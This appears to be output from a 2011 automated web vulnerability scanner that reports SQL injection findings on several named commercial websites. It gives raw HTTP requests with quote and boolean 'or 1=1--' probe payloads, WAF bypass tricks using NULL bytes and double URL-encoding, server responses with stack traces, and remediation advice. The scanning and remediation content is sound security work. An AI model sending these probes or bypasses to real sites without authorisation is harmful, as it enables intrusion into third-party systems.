SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Remediation background
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defence is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defence is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defence may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defence to be bypassed.
Another often cited defence is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
The lpjson parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the lpjson parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
The COBRANDID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the COBRANDID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /store/mfe/en_GB/buy'/productID.237091200 HTTP/1.1 Host: www.mcafeestore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=21859056255,0) Content-Length: 89067 Date: Fri, 30 Sep 2011 12:44:30 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb03@dc1app67 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head> <!--!esi:include src="/esi?Sit ...[SNIP]... <!--!esi:include src="/store?Action=DisplayESIPage&Currency=AUD&ESIHC=4b937cbd&Env=BASE&Locale=en_AU&SiteID=mfe&StyleID=24160400&StyleVersion=38&ceid=176851100&cename=TopHeader&id=ServerErrorPage&productID=237091200"--> ...[SNIP]... <pre>com.digitalriver.exception.TrackedSystemException: PRC_000001 at com.digitalriver.catalog.rules.AddItemToRequisition.doWork(AddItemToRequisition.java:291) at com.digitalriver.rules.ActionRule.evaluate(ActionRule.java:41) at ...[SNIP]...
Request 2
GET /store/mfe/en_GB/buy''/productID.237091200 HTTP/1.1 Host: www.mcafeestore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 302 Moved Temporarily Location: https://www.mcafeestore.com/store?''=&Action=buy&Env=BASE&Locale=en_GB&SiteID=mfe&productID=237091200 Content-Type: text/plain Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=107758402677,0) Content-Length: 0 Date: Fri, 30 Sep 2011 12:44:31 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb03@dc1app67 Connection: close
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /store/mfe/en_GB%2527/home HTTP/1.1 Host: www.mcafeestore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=64808723200,0) Content-Length: 24329 Date: Fri, 30 Sep 2011 12:44:24 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb03@dc1app62 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head> <!--!esi:include src="/esi?Sit ...[SNIP]... <!--!esi:include src="/store?Action=DisplayESIPage&Currency=GBP&ESIHC=f7b63e21&Env=BASE&Locale=en_GB&SiteID=mfe&StyleID=24160400&StyleVersion=38&ceid=176851100&cename=TopHeader&id=ServerErrorPage"--> ...[SNIP]... <pre>com.digitalriver.exception.TrackedSystemException: SIT_000001 at com.digitalriver.system.controller.SiteflowPlugin.determineNextPage(SiteflowPlugin.java:389) at com.digitalriver.system.controller.SiteflowPlugin.handleRequest( ...[SNIP]...
Request 2
GET /store/mfe/en_GB%2527%2527/home HTTP/1.1 Host: www.mcafeestore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 302 Moved Temporarily Pragma: no-cache Cache-Control: no-cache, no-store, must-revalidate, max-age=0, private Expires: Wed, 31 Dec 1969 23:59:59 GMT Location: https://www.mcafeestore.com/store?%27%27=&Action=en_GB&Env=BASE&Locale=en_GB&SiteID=mfe&home= Content-Type: text/plain Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=94873494588,0) Content-Length: 0 Date: Fri, 30 Sep 2011 12:44:25 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb03@dc1app62 Connection: close
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /store/mfe/en_GB/pd/productID.208082000 HTTP/1.1 Host: www.mcafeestore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=%00'
Response 1
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=64808723128,0) Content-Length: 32159 Date: Fri, 30 Sep 2011 12:44:24 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb03@dc1app62 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head> <!--!esi:include src="/esi?Sit ...[SNIP]... <span class="dr_error" id="qty_error_span"> ...[SNIP]... .getElementById('quantity'); // Returns true when the quantity is a positive integer function validQty(qty) { return /^[1-9]\d*$/.test(qty); } // Switch the class when the quantity is invalid function setQtyFocus() { if (!validQty(qtyField.value)) { qtyField.className = ErrorFocusClassName; } } // Resets the quantity field class when the user tabs off the field
...[SNIP]...
Request 2
GET /store/mfe/en_GB/pd/productID.208082000 HTTP/1.1 Host: www.mcafeestore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=%00''
Response 2
HTTP/1.1 302 Moved Temporarily Pragma: no-cache Cache-Control: no-cache, no-store, must-revalidate, max-age=0, private Expires: Wed, 31 Dec 1969 23:59:59 GMT Location: https://www.mcafeestore.com/store?Action=pd&Env=BASE&Locale=en_GB&SiteID=mfe&productID=208082000 Content-Type: text/plain Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=64808723471,0) Content-Length: 0 Date: Fri, 30 Sep 2011 12:44:25 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb03@dc1app62 Connection: close
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /store/mfe/en_GB/pd/productID.237091200 HTTP/1.1 Host: www.mcafeestore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=%00'
Response 1
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=21859050158,0) Content-Length: 31552 Date: Fri, 30 Sep 2011 12:44:24 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb03@dc1app62 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head> <!--!esi:include src="/esi?Sit ...[SNIP]... <span class="dr_error" id="qty_error_span"> ...[SNIP]... .getElementById('quantity'); // Returns true when the quantity is a positive integer function validQty(qty) { return /^[1-9]\d*$/.test(qty); } // Switch the class when the quantity is invalid function setQtyFocus() { if (!validQty(qtyField.value)) { qtyField.className = ErrorFocusClassName; } } // Resets the quantity field class when the user tabs off the field
...[SNIP]...
Request 2
GET /store/mfe/en_GB/pd/productID.237091200 HTTP/1.1 Host: www.mcafeestore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=%00''
Response 2
HTTP/1.1 302 Moved Temporarily Pragma: no-cache Cache-Control: no-cache, no-store, must-revalidate, max-age=0, private Expires: Wed, 31 Dec 1969 23:59:59 GMT Location: https://www.mcafeestore.com/store?Action=pd&Env=BASE&Locale=en_GB&SiteID=mfe&productID=237091200 Content-Type: text/plain Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=103463429157,0) Content-Length: 0 Date: Fri, 30 Sep 2011 12:44:25 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb03@dc1app62 Connection: close
1.7. http://www.pcaholic.com/wp-content/plugins/contact-form-7/jquery.form.js [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.pcaholic.com
Path:
/wp-content/plugins/contact-form-7/jquery.form.js
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 13737313%20or%201%3d1--%20 and 13737313%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /wp-content/plugins/contact-form-7/jquery.form.js?113737313%20or%201%3d1--%20=1 HTTP/1.1 Host: www.pcaholic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /wp-content/plugins/contact-form-7/jquery.form.js?113737313%20or%201%3d2--%20=1 HTTP/1.1 Host: www.pcaholic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
/*! * jQuery Form Plugin * version: 2.83 (11-JUL-2011) * @requires jQuery v1.3.2 or later * * Examples and documentation at: http://malsup.com/jquery/form/ * Dual licensed under the MIT and GPL licenses: * http://www.opensource.org/licenses/mit-license.php * http://www.gnu.org/licenses/gpl.html */ ;(function($) {
/* Usage Note: ----------- Do not use both ajaxSubmit and ajaxForm on the same form. These functions are intended to be exclusive. Use ajaxSubmit if you want to bind your own submit handler to the form. For example,
When using ajaxForm, the ajaxSubmit function will be invoked for you at the appropriate time. */
/** * ajaxSubmit() provides a mechanism for immediately submitting * an HTML form using AJAX. */ $.fn.ajaxSubmit = function(options) { // fast fail if nothing selected (http://dev.jquery.com/ticket/2752) if (!this.length) { log('ajaxSubmit: skipping submit process - no element selected'); return this; }
1.8. http://www.pcaholic.com/wp-content/plugins/contact-form-7/scripts.js [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.pcaholic.com
Path:
/wp-content/plugins/contact-form-7/scripts.js
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 10647341%20or%201%3d1--%20 and 10647341%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /wp-content/plugins/contact-form-7/scripts.js?110647341%20or%201%3d1--%20=1 HTTP/1.1 Host: www.pcaholic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /wp-content/plugins/contact-form-7/scripts.js?110647341%20or%201%3d2--%20=1 HTTP/1.1 Host: www.pcaholic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
if (data.onSubmit) $.each(data.onSubmit, function(i, n) { eval(n) });
$(data.into).find('.wpcf7-use ...[SNIP]...
1.9. http://www.pcaholic.com/wp-content/plugins/contact-form-7/styles.css [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.pcaholic.com
Path:
/wp-content/plugins/contact-form-7/styles.css
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 33260542%20or%201%3d1--%20 and 33260542%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /wp-content/plugins/contact-form-7/styles.css?133260542%20or%201%3d1--%20=1 HTTP/1.1 Host: www.pcaholic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /wp-content/plugins/contact-form-7/styles.css?133260542%20or%201%3d2--%20=1 HTTP/1.1 Host: www.pcaholic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.10. http://www.pcaholic.com/wp-content/plugins/sociable/addtofavorites.js [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.pcaholic.com
Path:
/wp-content/plugins/sociable/addtofavorites.js
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 89917484%20or%201%3d1--%20 and 89917484%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /wp-content/plugins/sociable/addtofavorites.js?189917484%20or%201%3d1--%20=1 HTTP/1.1 Host: www.pcaholic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /wp-content/plugins/sociable/addtofavorites.js?189917484%20or%201%3d2--%20=1 HTTP/1.1 Host: www.pcaholic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
function AddToFavorites() { var title = document.title; var url = location.href; if (window.sidebar) // Firefox window.sidebar.addPanel(title, url, ''); else if(window.opera && window.print) // Opera { var elem = document.createElement('a'); elem.setAttribute('href',url); elem.setAttribute('title',title); elem.setAttribute('rel','sidebar'); // required to work in opera 7+ elem.click(); } else if(document.all) // IE window.external.AddFavorite(url, title); }
1.11. http://www.pcaholic.com/wp-content/plugins/sociable/sociable.css [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.pcaholic.com
Path:
/wp-content/plugins/sociable/sociable.css
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 14496072%20or%201%3d1--%20 and 14496072%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /wp-content/plugins/sociable/sociable.css?114496072%20or%201%3d1--%20=1 HTTP/1.1 Host: www.pcaholic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /wp-content/plugins/sociable/sociable.css?114496072%20or%201%3d2--%20=1 HTTP/1.1 Host: www.pcaholic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.12. http://www.pcaholic.com/wp-includes/js/jquery/jquery.js [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.pcaholic.com
Path:
/wp-includes/js/jquery/jquery.js
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 88865280%20or%201%3d1--%20 and 88865280%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /wp-includes/js/jquery/jquery.js?188865280%20or%201%3d1--%20=1 HTTP/1.1 Host: www.pcaholic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /wp-includes/js/jquery/jquery.js?188865280%20or%201%3d2--%20=1 HTTP/1.1 Host: www.pcaholic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
/*! * jQuery JavaScript Library v1.6.1 * http://jquery.com/ * * Copyright 2011, John Resig * Dual licensed under the MIT or GPL Version 2 licenses. * http://jquery.org/license * * Includes Sizzle.js * http://sizzlejs.com/ * Copyright 2011, The Dojo Foundation * Released under the MIT, BSD, and GPL Licenses. * * Date: Thu May 12 15:04:36 2011 -0400 */ (function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cv(a){if(!cj[a]){var b=f("<"+a+">").appendTo("body"),d=b.css("display");b.remove();if(d==="none"||d===""){ck||(ck=c.createElement("iframe"),ck.frameBorder=ck.width=ck.height=0),c.body.appendChild(ck);if(!cl||!ck.createElement)cl=(ck.contentWindow||ck.contentDocument).document,cl.write("<!doctype><html><body></body></html>");b=cl.createElement(a),cl.body.appendChild(b),d=f.css(b,"display"),c.body.removeChild(ck)}cj[a]=d}return cj[a]}function cu(a,b){var c={};f.each(cp.concat.apply([],cp.slice(0,b)),function(){c[this]=a});return c}function ct(){cq=b}function cs(){setTimeout(ct,0);return cq=f.now()}function ci(){try{return new a.ActiveXObject("Microsoft.XMLHTTP")}catch(b){}}function ch(){try{return new a.XMLHttpRequest}catch(b){}}function cb(a,c){a.dataFilter&&(c=a.dataFilter(c,a.dataType));var d=a.dataTypes,e={},g,h,i=d.length,j,k=d[0],l,m,n,o,p;for(g=1;g<i;g++){if(g===1)for(h in a.converters)typeof h=="string"&&(e[h.toLowerCase()]=a.converters[h]);l=k,k=d[g];if(k==="*")k=l;else if(l!=="*"&&l!==k){m=l+" "+k,n=e[m]||e["* "+k];if(!n){p=b;for(o in e){j=o.split(" ");if(j[0]===l||j[0]==="*"){p=e[j[1]+" "+k];if(p){o=e[o],o===!0?n=p:p===!0& ...[SNIP]...
1.13. http://www.pcaholic.com/wp-includes/js/l10n.js [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.pcaholic.com
Path:
/wp-includes/js/l10n.js
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 17799343%20or%201%3d1--%20 and 17799343%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /wp-includes/js/l10n.js?117799343%20or%201%3d1--%20=1 HTTP/1.1 Host: www.pcaholic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /wp-includes/js/l10n.js?117799343%20or%201%3d2--%20=1 HTTP/1.1 Host: www.pcaholic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
function convertEntities(b){var d,a;d=function(c){if(/&[^;]+;/.test(c)){var f=document.createElement("div");f.innerHTML=c;return !f.firstChild?c:f.firstChild.nodeValue}return c};if(typeof b==="string"){return d(b)}else{if(typeof b==="object"){for(a in b){if(typeof b[a]==="string"){b[a]=d(b[a])}}}}return b};
1.14. http://www.pcaholic.com/xmlrpc.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.pcaholic.com
Path:
/xmlrpc.php
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 15000864%20or%201%3d1--%20 and 15000864%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /xmlrpc.php?115000864%20or%201%3d1--%20=1 HTTP/1.1 Host: www.pcaholic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /xmlrpc.php?115000864%20or%201%3d2--%20=1 HTTP/1.1 Host: www.pcaholic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /sycro/comm/stats.asp HTTP/1.1 Host: www.sycro.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q='
Response 1
HTTP/1.1 302 Object moved Server: Microsoft-IIS/5.0 Date: Fri, 30 Sep 2011 12:32:54 GMT X-Powered-By: ASP.NET Connection: close Location: /sycro/order/basket.asp?mode=error500 Content-Length: 158 Content-Type: text/html Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/sycro/order/basket.asp?mode=error500">here</a>.</body>
Request 2
GET /sycro/comm/stats.asp HTTP/1.1 Host: www.sycro.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=''
Response 2
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Fri, 30 Sep 2011 12:32:55 GMT X-Powered-By: ASP.NET Connection: close Content-Length: 21 Content-Type: application/x-javascript Cache-control: private
The EdpNo parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the EdpNo parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
The PG parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the PG parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the PG request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /secure/orderlogin.asp?PG=1%2527 HTTP/1.1 Host: www.tigerdirect.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /secure/orderlogin.asp?PG=1%2527%2527 HTTP/1.1 Host: www.tigerdirect.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /secure/orderlogin.asp HTTP/1.1 Host: www.tigerdirect.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=%00'
GET /secure/orderlogin.asp HTTP/1.1 Host: www.tigerdirect.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=%00''
